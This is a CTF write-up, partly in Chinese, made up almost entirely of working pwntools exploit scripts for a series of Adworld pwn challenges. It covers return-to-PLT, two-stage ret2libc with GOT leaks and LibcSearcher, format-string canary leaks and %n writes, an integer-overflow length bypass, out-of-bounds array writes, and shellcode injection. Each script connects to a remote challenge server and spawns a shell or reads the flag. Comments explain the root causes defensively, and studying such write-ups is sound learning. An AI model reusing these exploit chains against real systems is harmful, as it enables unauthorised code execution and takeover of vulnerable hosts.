ADworld wp1


If you don’t go into the water, you can’t swim in your life

文中所用到的程序文件:bin file

cgpwn2

from pwn import *
context.arch = 'i386'

# cgpwn2: return-to-PLT on a 32-bit binary. The script sends two inputs:
# a "name" string and an overflowing buffer. Because the binary already
# imports system(), no libc leak is needed; the only prerequisites are a
# non-PIE binary (fixed addresses below) and an unchecked copy into a
# stack buffer. From a defender's view a length-checked read (or a stack
# canary) on the second input is what stops the return-address overwrite;
# whether the binary has either is not visible in this script.

# p = process('./pwn')
p = remote('111.198.29.45',35993)
elf = ELF('./pwn')
main = elf.sym['main']
system_plt = elf.sym['system']     # PLT stub of system(), resolved from the binary
binsh = 0x0804A080                 # hard-coded .bss/.data address; presumably where the "name" below lands -- verify in the binary
p.sendlineafter("name\n",'/bin/sh\x00')   # plant the string that will be system()'s argument
# 42 bytes of filler reach the saved return address; then the i386 call
# frame for system(): target, fake return address (main), argument pointer.
payload = 'A'*42 + p32(system_plt) + p32(main) + p32(binsh)
p.sendlineafter('here:\n',payload)
sleep(1)
p.interactive()

forgot

from pwn import *
context.arch='i386'

# forgot: a single unchecked write of 63 bytes + 4 redirects execution to
# the routine the author labelled `flag` (address taken from the binary,
# so the binary is assumed not to be PIE). The decompiled code is not in
# this write-up, so which slot (return address or a function pointer) is
# overwritten at offset 63 is not confirmed here.

# p = process('./pwn')
p = remote('111.198.29.45',32374)

flag = 0x080486CC                  # fixed address of the target routine
# filler up to the overwritten slot, then the little-endian 32-bit target
p.sendline('A'*63 + p32(flag))
sleep(1)
print p.recv()                     # Python 2 print statement (this is a Python 2 / old-pwntools script)

int_overflow

from pwn import *
context.arch = 'i386'

# int_overflow: the password length is narrowed to an 8-bit register
# before the range check, so a password of 256+k bytes passes the
# "3 < len <= 8" test and is then copied with strcpy into a fixed-size
# stack buffer. Root cause from a defender's view: the check validates a
# truncated value -- the length must be checked in its full width before
# the copy, and the copy itself should be bounded.

# p = process('./pwn')
p = remote('111.198.29.45',53636)

p.sendlineafter('Your choice:','1')
p.sendafter('username:','asd')

payload = 'A'*0x18 + p32(ELF('./pwn').sym['what_is_this'])
# make the eip point to function 'what_is_this' by stack overflow
p.sendafter("passwd:",payload.ljust(256+4,'B'))
# check_password stores the passwd length in the 8-bit register al;
# for a 256-byte (0xff+1) passwd al wraps to 0, for 256+k it holds k.
# To pass the check `if ( v3 <= 3u || v3 > 8u )` the total length must
# lie in (256+3, 256+8]; 256+4 is used above.
# strcpy then copies the whole string, overflowing the stack buffer.
p.recvuntil('Success\n')
print p.recv()

string

from pwn import *
context.arch = 'amd64'

# string: the program leaks the address of `secret[0]`, a later prompt is
# printed through a format-string bug (the "%85c%7$n" write below changes
# the value at an address the user supplied one prompt earlier), and the
# final prompt accepts shellcode. Root cause from a defender's view is
# printf(user_input); the info leak and executable user data are what make
# the write and the shellcode stage usable despite ASLR.

# p = process('./pwn')
p = remote('111.198.29.45',53218)

print p.recvuntil('secret[0] is ')
a_0 = int(p.recvuntil('\n',drop=True),16)   # leaked address, printed in hex
log.info('a_0 = %#x',a_0)

p.sendlineafter("What should your character's name be:\n",'nop')
p.sendlineafter("So, where you will go?east or up?:","east")
p.sendlineafter("go into there(1), or leave(0)?:\n",'1')
p.sendlineafter("'Give me an address'\n",str(a_0))   # the address %n below writes through
# %85c emits 85 characters, %7$n stores that count into the 7th argument
# slot (the address sent above); 85 is presumably the value the program's
# check expects -- confirm against the binary.
p.sendlineafter("And, you wish is:\n",'%85c%7$n')
# shellcraft.sh() is pwntools' stock execve("/bin/sh") payload for context.arch;
# the program is assumed to place this input somewhere executable and jump to it.
p.sendlineafter("Wizard: I will help you! USE YOU SPELL\n",asm(shellcraft.sh()))
sleep(1)
p.interactive()

level3

from pwn import *
from LibcSearcher import *
context(arch='i386',os='linux')

# level3: two-stage ret2libc on a 32-bit, non-PIE binary.
#   stage 1 -- overflow, then call write(1, &GOT[write], 8) to leak the
#              runtime address of write() and return into main;
#   stage 2 -- overflow again and call system("/bin/sh") with addresses
#              derived from the leak (LibcSearcher guesses the remote libc).
# The leak works because GOT addresses are fixed in a non-PIE binary; a
# stack canary or a bounds-checked read would stop stage 1 outright.
# (Author's note: simple stack overflow; the challenge file came as a
# tar.gz that WinRAR could not extract in one go.)

# p = process('./level3')
p = remote('124.126.19.106',33163)
elf = ELF('./level3',checksec=False)

write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.sym['main']

p.recvuntil("Input:\n")
payload = 'A'*(0x88+4)             # buffer (0x88) + saved ebp (4) up to the return address
# i386 frame: write@plt, return to main, then args fd=1, buf=GOT[write], len=8
payload += flat([write_plt, main, 1, write_got, 8])
p.send(payload)
write_addr = u32(p.recv(4))        # only the first 4 of the 8 leaked bytes are needed
log.success("write_addr = %#x",write_addr)

libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
log.success("system_addr = %#x, binsh = %#x"%(system_addr,binsh))

p.recvuntil("Input:\n")            # main was re-entered, so the prompt appears again
payload = 'A'*(0x88+4)
payload += flat([system_addr, main, binsh])   # system("/bin/sh") with fake return into main
p.send(payload)
sleep(0.1)
p.interactive()

Mary_Morton

from pwn import *
context(arch='amd64',os='linux')

# Mary_Morton: the program offers three functions --
#   one leaks the stack canary through a format-string bug,
#   one hijacks control flow through a stack overflow,
#   one reads the flag but is never called by the program itself.
# The canary does its job only as long as it stays secret; the format-string
# bug (printf on user input) is what turns the overflow into a usable one.

# p = process('../Mary_Morton')
p = remote('124.126.19.106',58817)

getshell = 0x00000000004008DA      # fixed address of the never-called flag routine (binary assumed non-PIE)

print p.recvuntil('Exit the battle')
p.sendline('2')                    # menu 2: the format-string function
p.send('%23$p')                    # print the 23rd argument slot as a pointer; the author found the canary there

canary = int(p.recvuntil("1. Stack Bufferoverflow Bug ",drop=True),16)
log.success('canary = %#x',canary)

p.recvuntil('Exit the battle')
p.sendline('1')                    # menu 1: the overflow function
# filler up to the canary slot, the leaked canary (so the check passes),
# 8 bytes for the saved rbp, then the new return address.
payload = 'A'*(0x90 - 8) + p64(canary) + 'B'*8 + p64(getshell)
p.send(payload)
# p.recvuntil('B'*8)
p.recv()
sleep(0.1)
print p.recv()
print p.recv()

pwn-100

from pwn import *
from LibcSearcher import *
context(arch='amd64',os='linux',log_level='DEBUG')   # DEBUG logs every byte exchanged

# pwn-100: two-stage ret2libc on a 64-bit, non-PIE binary.
#   stage 1 -- overflow, ROP: pop rdi; ret -> puts(GOT[puts]) -> main,
#              leaking the runtime address of puts();
#   stage 2 -- overflow again, ROP: pop rdi; ret -> system("/bin/sh").
# On x86-64 the first argument travels in rdi, hence the gadget. A stack
# canary or a bounded read would stop both stages; the fixed gadget and
# main addresses below rely on the binary not being PIE.

# p = process('./pwn-100')
p = remote('124.126.19.106',50678)
elf = ELF('./pwn-100',checksec=False)

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x00000000004006B8

pop_rdi = 0x0000000000400763 # pop rdi ; ret

payload = 'A'*(0x40 + 8)            # buffer (0x40) + saved rbp (8) up to the return address
payload += flat([pop_rdi, puts_got, puts_plt, main])
payload = payload.ljust(200,'\x90') # pad to 200 bytes; presumably the program reads a fixed-size record -- verify
p.send(payload)

p.recvuntil('bye~\n')
# puts() prints the GOT entry up to its first NUL; pad back to 8 bytes before unpacking
puts_addr = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00'))
log.success('puts_addr = %#x',puts_addr)

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
log.success('system_addr = %#x, binsh = %#x'%(system_addr, binsh))

payload = 'A'*(0x40 + 8)
payload += flat([pop_rdi, binsh, system_addr, main])   # system("/bin/sh"), then back to main
payload = payload.ljust(200,'\x90')
p.send(payload)
sleep(0.1)
p.interactive()

pwn-200

from pwn import *
from LibcSearcher import *
context(arch='i386',os='linux')

# pwn-200: same two-stage ret2libc as level3, with a different buffer
# size (0x6c) and a hard-coded main address -- write(1, &GOT[write], 8)
# leaks the libc address of write(), then system("/bin/sh") is called.
# As there, the fixed GOT/main addresses require a non-PIE binary, and a
# canary or length-checked read would stop the first overflow.

# p = process('./pwn-200')
p =remote('124.126.19.106',53404)
elf = ELF('./pwn-200',checksec=False)

write_plt = elf.plt['write']
write_got = elf.got['write']
main = 0x080484BE

p.recv()                           # drain the banner/prompt (contents not checked)
payload = 'A'*(0x6c+4)             # buffer (0x6c) + saved ebp (4) up to the return address
payload += flat([write_plt, main, 1, write_got, 8])   # write(1, GOT[write], 8), return to main
p.send(payload)

write_addr = u32(p.recv(4))        # first 4 of the 8 leaked bytes
log.success('write_addr = %#x',write_addr)

libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
log.success('system_addr = %#x, binsh = %#x'%(system_addr, binsh))

p.recv()                           # drain the remaining leaked bytes and the new prompt
payload = 'A'*(0x6c +4)
payload += flat([system_addr, main, binsh])   # system("/bin/sh") with fake return into main
p.send(payload)
sleep(0.1)
p.interactive()

stack2

未对数据边界检查,存在数组越界,可以任意地址写

      puts("which number to change:");
      __isoc99_scanf("%d", &v5);
      puts("new number:");
      __isoc99_scanf("%d", &v7);
      v13[v5] = v7;

利用这一点覆写栈中存储的返回地址,此处需要注意因为对齐,偏移为0x84, 此外题目环境没有/bin/bash, 所以不能直接使用程序中提供的函数(本地测试的时候可以)

from pwn import *

context(arch='i386',os='linux')

# stack2: the "change a number" menu option writes v13[v5] = v7 without
# range-checking the index v5, so any stack slot above the array can be
# overwritten one byte at a time -- including the saved return address.
# The missing check `0 <= v5 < count` before the store is the whole bug.
# The remote box has no /bin/bash, so the binary's own helper (hackhere)
# is not usable there; system@plt is called with the "sh" string instead.

# p = process('./stack2')
p = remote('124.126.19.106',54932)
elf = ELF('./stack2',checksec=False)

system_plt = 0x08048450            # system() PLT stub (fixed: binary assumed non-PIE)
sh = 0x08048987                    # address of an "sh" string in the binary
hackhere = 0x0804859B              # built-in helper that runs /bin/bash -- fails remotely, see below


def change(index, value):
    """Drive menu option 3 once: store ``value`` into array slot ``index``.

    Each step waits for the program's prompt and answers it on one line;
    the order of the exchange (menu choice, index, value) is fixed by the
    remote program and must not change.
    """
    exchange = (
        ('5. exit', '3'),
        ("which number to change:\n", str(index)),
        ("new number:\n", str(value)),
    )
    for prompt, reply in exchange:
        p.recvuntil(prompt)
        p.sendline(reply)


p.recvuntil("How many numbers you have:")
p.sendline('1')                    # declare a one-element array
p.recvuntil("Give me your numbers")
p.sendline('2')

start = 0x84                       # index of the saved return address (0x84 because of alignment, per the write-up)
# First attempt: point the return address at hackhere (0x0804859b,
# written low byte first, one byte per index). It reached interactive
# mode but the remote box lacks /bin/bash:
# change(start, 0x9b)
# change(start+1, 0x85)
# change(start+2, 0x04)
# change(start+3, 0x08)
# # [+] Opening connection to 124.126.19.106 on port 54932: Done
# # [*] Switching to interactive mode

# # sh: 1: /bin/bash: not found

# Return address := system_plt (0x08048450), little-endian, byte by byte
change(start, 0x50)
change(start+1, 0x84)
change(start+2, 0x04)
change(start+3, 0x08)

start += 8                         # skip the fake return slot; this is system()'s first argument
# argument := sh (0x08048987), little-endian
change(start, 0x87)
change(start+1, 0x89)
change(start+2, 0x04)
change(start+3, 0x08)

p.recvuntil('5. exit')
p.sendline('5')                    # exit: the function returns into the overwritten address
sleep(0.1)
p.interactive()

pwn1

from pwn import *
from LibcSearcher import *
context(arch='amd64',os="linux",log_level='DEBUG')

# p = process('./babystack')
p = remote('124.126.19.106',49614)
elf = ELF('./babystack',checksec=False)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# libc = ELF('./libc-2.23.so',checksec=False)
main = 0x0000000000400908
pop_rdi = 0x0000000000400a93 # pop rdi ; ret

# step1: leak canary
p.recvuntil(">> ")
p.send('1')
payload = 'A'*(0x90-0x8) + 'B'
p.send(payload)

p.recvuntil(">> ")
p.send('2')
p.recvuntil('B')
canary = u64('\x00'+p.recv(7))
log.success('canary = %#x',canary)
# pause()

#step2: leak libc_base
p.recvuntil(">> ")
p.send(str('1'))
payload = 'A'*(0x90-0x8) + p64(canary) + 'B'*0x8
payload += flat([pop_rdi, puts_got, puts_plt, main])
p.send(payload)

p.recvuntil(">> ")
p.send('3')
puts_addr = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00'))
log.success('puts_addr = %#x',puts_addr)
# pause()

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
log.success('system_addr = %#x, binsh = %#x'%(system_addr,binsh))

# libc_base = puts_addr - libc.sym['puts']

# # step3: getshell

p.recvuntil(">> ")
p.send('1')
payload = 'A'*(0x90-0x8) + p64(canary) + 'B'*0x8
payload += flat([pop_rdi, binsh, system_addr, main])
# payload += flat([
#   pop_rdi, libc_base+libc.search('/bin/sh').next(), libc_base+libc.sym['system'], main])
p.send(payload)
p.recvuntil(">> ")
p.send('3')
sleep(0.1)
p.interactive()